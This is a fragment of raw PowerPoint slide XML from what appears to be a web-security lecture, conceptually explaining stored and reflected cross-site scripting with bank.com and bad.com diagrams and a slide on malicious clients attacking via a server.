            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Shape 726"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="864305" indent="-864305" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4900">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Stored (or “persistent”) XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Attacker leaves their script on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The server later unwittingly sends it to your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Your browser, none the wiser, executes it within the same origin as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>erver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864305" indent="-864305" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4900">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Attacker gets you to send the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> server a URL that includes some </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>echoes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> the script back to you in its response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Your browser, none the wiser, executes the script in the response within the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Shape 727"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4136123" y="7208921"/>
            <a:ext cx="16609181" cy="5420435"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499774403"/>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6" name="Shape 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361297" y="4191502"/>
            <a:ext cx="3321264" cy="1989599"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11871"/>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07" name="Shape 407"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387452" y="525507"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Planting a bomb</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 408"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="4336264"/>
            <a:ext cx="2363300" cy="1700075"/>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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Shape 409"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="4336264"/>
            <a:ext cx="3637474" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>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3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Service provider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Shape 410"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6132611" y="3247958"/>
            <a:ext cx="17786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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427265" y="4191502"/>
            <a:ext cx="4595438" cy="3123196"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10463"/>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412" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14441523" y="3247958"/>
            <a:ext cx="456692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Remote service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8649390" y="5675717"/>
            <a:ext cx="6315373" cy="1825139"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Shape 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20575664">
            <a:off x="9272626" y="5785098"/>
            <a:ext cx="40728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CALL </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7df0sdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Shape 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8157403" y="4682421"/>
            <a:ext cx="6795019" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Shape 416"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481469" y="9319991"/>
            <a:ext cx="19421062" cy="3148596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Server needs to protect good clients</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> from malicious clients that will try to launch attacks via the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1002347" lvl="1" indent="-562292" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>orrupt the server state (e.g., uploading malicious files or code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1002347" lvl="1" indent="-562292" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Good client interaction affected as a result (e.g., getting the malware)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="417" name="pasted-image.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5485252" y="5993965"/>
            <a:ext cx="3073353" cy="3334222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419631" y="6266169"/>
            <a:ext cx="2686716" cy="2823993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Shape 419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8157403" y="5387268"/>
            <a:ext cx="6795019" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10405116" y="4534669"/>
            <a:ext cx="174371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CALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12158471" y="4534669"/>
            <a:ext cx="103822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chemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75145729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13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="413"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="414"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="11" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L 0.174893 -0.003011" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.174893 -0.003011 L 0.587310 -0.218412" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="418"/>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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="419"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="419"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="420"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.587310 -0.218412 L -0.002140 -0.221772" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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0" animBg="1" advAuto="0"/>
      <p:bldP spid="414" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="415" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="419" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="420" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="421"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378523" y="614994"/>
            <a:ext cx="15609094" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Stored XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="732" name="Group 732"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5442370" y="5030660"/>
            <a:ext cx="2561093" cy="3657657"/>
            <a:chOff x="538190" y="2976"/>
            <a:chExt cx="2561092" cy="3657656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="730" name="Shape 730"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="538190" y="981726"/>
              <a:ext cx="2561093" cy="2678908"/>
            </a:xfrm>
            <a:prstGeom prst="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3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="731" name="Shape 731"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929419" y="2976"/>
              <a:ext cx="177863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Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Shape 733"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15156932" y="8862344"/>
            <a:ext cx="3060194" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Shape 734"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15156932" y="2719480"/>
            <a:ext cx="3060194" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>bad.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="740" name="Group 740"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15883090" y="5490653"/>
            <a:ext cx="2819607" cy="3370728"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2819605" cy="3370727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="735" name="Shape 735"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-1"/>
              <a:ext cx="2" cy="3370729"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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736" name="Shape 736"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
